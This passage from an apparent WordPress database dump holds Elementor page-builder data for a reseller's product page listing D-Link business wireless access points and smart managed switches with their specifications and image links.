Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7269,3367,'_elementor_version','2.5.14'),(7270,3367,'_elementor_edit_mode','builder'),(7273,3368,'_wp_page_template','template-fullwidth.php'),(7274,3368,'_elementor_template_type','post'),(7275,3368,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G 